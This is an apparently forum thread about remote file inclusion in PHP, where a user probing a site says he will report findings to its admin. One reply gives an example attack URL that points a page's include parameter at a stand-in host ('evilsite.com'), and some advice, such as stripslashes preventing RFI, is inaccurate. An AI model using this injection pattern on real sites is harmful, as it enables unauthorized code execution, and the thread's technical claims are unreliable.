Remote File Inclusion ?Help?

If you have seen the php.ini file for a web server and see that they have register globals turned off BUT have

; Whether to allow the treatment of URLs (like http:// or ftp://) as files. allow_url_fopen = On allow_url_include = On under Fopen does this mean they are almost certainly vulnerable to RFI?

Whats the easiest way to find where they are using $_GET or including files that are vulnerable to remote file inclusion?

My guess is that I will have to try to inject into every parameter and just see what happens but I would like to know if (through experience) anyone knows of a typical file inclusion vulnerability that people tend to fall back on without realizing it.

Because they have fopen and include on, does that mean they are most definitely vulnerable to RFI?

p.s. they don't have ANY filters for user input, there are tons of xss holes in the site. I plan on giving the admin a full list of the vulnerabilities I find but I wanna make sure i have most of the important ones.
They do have on magic_quotes though so sql injection is a lot harder..

No, that doesn't mean one is almost certainly vulnerable to RFI, but it does add to the vulnerability. They would have to not sanitize their strings with stripslashes. If those 2 conditions are met, a server is vulnerable to RFI. I didn't understand the 'how do I find out how or what $_GET variable they're using' sounded to me though like you wanted to find out what variable the attacker was trying to pass through. If that's the case, you'd need to add the variable to a database everytime, which would really slow the server down and is quite unnecessary.

slpctrl wrote: No, that doesn't mean one is almost certainly vulnerable to RFI, but it does add to the vulnerability. They would have to not sanitize their strings with stripslashes. If those 2 conditions are met, a server is vulnerable to RFI. I didn't understand the 'how do I find out how or what $_GET variable they're using' sounded to me though like you wanted to find out what variable the attacker was trying to pass through. If that's the case, you'd need to add the variable to a database everytime, which would really slow the server down and is quite unnecessary.

no what i meant by that is when the server is using GET method to grab a url like "/members" and you give it an external url to include. But now i understand that part of it. Thanks for your help :happy:

Infam0us wrote: no what i meant by that is when the server is using GET method to grab a url like "/members" and you give it an external url to include.

You can't do something like http://www.site.com/folder/http://www.evilsite.com/ if that's what you mean, you're looking for something like

http://www.site.com/folder/content.php?page=http://www.evilsite.com/

RFI's only work if the site permits.

you cant go up to any site you want that has fopen URL on, and magically do a RFI on any page.

you can only perform a RFI attack on a page that already includes a local/remote file. a RFI attack is when you change the included file path, to the location of your chosen file.

So, if the website is just statis html.. RFI won't be possible on that domain.

if a server is hosted on the same space as the webmasters box and RFI is active and the file included is on the local machine out of the admins personal my docs file could you open up the entire my docs folder and access all files in it

sorry if this sounds extremely stupid i just dont know much about RFI it just seemed possible from what little i do know